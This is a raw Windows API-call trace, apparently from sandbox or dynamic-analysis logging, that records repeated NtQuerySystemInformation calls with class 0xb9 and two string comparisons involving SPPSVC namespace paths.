[0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x28, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.248] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.257] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0273.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0273.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0273.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) 